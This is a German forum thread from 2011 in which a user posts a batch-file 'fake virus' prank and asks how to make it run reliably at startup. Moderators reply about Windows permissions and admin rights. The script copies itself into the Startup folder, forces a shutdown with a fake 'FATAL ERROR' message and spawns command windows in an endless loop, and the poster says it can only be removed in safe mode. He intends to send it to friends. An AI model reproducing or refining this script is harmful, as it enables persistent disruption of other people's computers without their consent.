Frage zu Batch Datei

Dieses Thema im Forum "Alles für den Einsteiger" wurde erstellt von Paintloud, 07.09.2011.

1. #1 Paintloud, 07.09.2011
    Zuletzt bearbeitet: 07.09.2011
    Paintloud

Paintloud Erfahrener Benutzer

Hallo zusammen. Ich kenne viele "Fake-Virus" mithilfe von Batch-Dateien. Allerdings sind die alle nicht so das wahre. Deshlab hab ich mir überlegt die Batch-Datei einfach in den Autostart-Ordner kopieren zu lassen, damit sie nach jedem Systemstart automatisch ausgeführt wird. Ich hab also folgende Datei geschrieben:

@echo off
    copy "KlickMe.bat" "%homedrive%%homepath%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
    shutdown -s -t 30 -c "FATAL ERROR"
    :kp
    start
    color 0c
    echo Virus Detected!
    goto kp

Simpel aber effektiv. Jetzt hab ich aber das Problem, dass die Batch gar nicht beim Systemstart ausgeführt wird, oder zumindest nicht richtig. Wenn ich nämlich das System neu starte sagt er mir in nem cmd Fenster, dass die Datei im System nicht gefunden werden konnte oder so ähnlich. Hab im Pfad nachgeschaut, die Datei befindet sich im Autostart Ordner! Weiss jemand wie man das umgehen kann dass es klappt?

2. AdMan

schau mal hier: Windows-Wartungs-Tool. Viele Probleme lassen sich damit einfach beheben. Oftmals ist der PC dann auch schneller!
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren.
  3. sunday

sunday Neuer Benutzer

Darf man wissen wen Du damit ärgern möchtest?

4. #3 Paintloud, 07.09.2011
    Paintloud

Den Staat. Was denkst denn du :D?
    Ein paar Freunde natürlich ^^

5. #4 xandros, 07.09.2011
    xandros

xandros IT Consultant, Cisco Registered Partner
    Moderator

Umkreis Duisburg, neben Mannheim, hinter Hamburg
    Ja! Schau dir das Rechtesystem des Zielbetriebssystemes an. Spaetestens ab Vista wirst du mit dem Skript gegen eine Wand rennen, da das Unterverzeichnis \AppData bereits ein Systemverzeichnis ist, in dem man ohne entsprechende Rechte erst gar nichts ausfuehren darf.

Nebenbei: Dein Quelltext verursacht einen Fehler! Die Datei kann sich nicht auf sich selbst kopieren!

6. #5 Paintloud, 07.09.2011
    Zuletzt bearbeitet: 07.09.2011
    Paintloud

Hm ich weiss nicht also ich bei mir hats mal geklappt und ich hab Windows 7 drauf. Musste dann im abgesicherten Modus die Datei aus dem Autostartordner entfernen. Insofern klappt das mit dem kopieren in den Autostart Ordner schon. Habs dann paar Kollegen zum testen geschickt und bei denen hat es nicht geklappt. Du sagst ja, man könne das umgehen sprich beheben.

Wie denn? Wie muss ich die Batch schreiben dass das so klappt wie ich es eigentlich geplant hab`?

7. #6 xandros, 08.09.2011
    xandros

xandros IT Consultant, Cisco Registered Partner
    Moderator

Umkreis Duisburg, neben Mannheim, hinter Hamburg
    Unter W7? gar nicht. Verwende die Powershell! Darueber gibt es dann auch die entsprechenden Funktionen, die dir die notwendigen Rechte und Signaturen ermoeglichen.

8. #7 Paintloud, 08.09.2011
    Paintloud

Hab grad gemerkt das meine Kollegen alle kein Win7 hatten. Der Code funktioniert unter Windows 7 einwandfrei. Habs jetzt an 3 verschiedenen PC's mit Win7 getestet und hat überall funktioniert.

Der Batch kann nur im abgesicherten Modus empfernt werden. Ansonsten stürzt er bei jedem Start ab ;)
    Tut mir leid aber du lagst vollkommen falsch.

9. heinzl

heinzl .

Nein ;)
    Ja logisch bei einem Konto mit Adminrechten.

Wenn es nicht gerade eine Frickelbude ist, arbeiten User bei keiner Firma mit Adminrechten.

10. AdMan

Es ist generell erstmal empfehlenswert alle ggf. veralteten oder fehlerhaften Treiber zu scannen und auf neue zu aktualisieren. Hier kannst du einen Treiber-Scanner downloaden. Das erspart oftmals viel Ärger und hilft gegen diverse Probleme.
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren.
  11. #9 Paintloud, 08.09.2011
    Paintloud

Das ist ja Privatbenutzer und nicht für Firmen gedacht lol

12. #10 helidoc, 09.09.2011
    helidoc

helidoc killed by a black pudding
    Moderator

...auch private Nutzer sollten nicht mit Admin-Rechten arbeiten.

Thema: Frage zu Batch Datei
Besucher kamen mit folgenden Suchen
  1. automatisch batchdatei ausführen win7

,
  2. user batch-aw

,
  3. batch windows 7 abgesicherter mosud starten

Die Seite wird geladen...

Frage zu Batch Datei - Ähnliche Themen

1. da-Vinci-Code-Datei????

da-Vinci-Code-Datei????: Ich weiß nicht ob ich hier richtig bin, sonst bitte verschieben. Seit dem 11.11. stehen komplett alle unsere Fotos auf oben genannter...
  2. Frage zu windows 10 update

Frage zu windows 10 update: hallo community :) Ich hab folgende Frage: Ich wollte mir vielleicht einen neuen rechner zulegen und ich hab mich gefragt ob ich dann die ältere...
  3. 3 Monate alte Datei wiederherstellen

3 Monate alte Datei wiederherstellen: Servus, Habe folgendes Problem. Vor Ca. 3 Monaten hab ich ne Datei gelöscht mit dem Glauben Sie sei irrelevant. Hab mich sehr getäuscht diese...
  4. Dateien von Linux vServer auf Google Drive hochladen?

Dateien von Linux vServer auf Google Drive hochladen?: Hallo, ist es eigentlich irgendwie möglich, dass man Dateien direkt von einem vServer (Linux, verbunden eben mit putty) auf sein Google...
  5. Wie die Datei in MS Project 2007 zu öffnen?

Wie die Datei in MS Project 2007 zu öffnen?: Ich versuchte die Datei in MS Project 2007 zu öffnen und bekam die Fehlermeldung “Eine unerwartete Fehler bei der Dateieröffnung. Datei kann...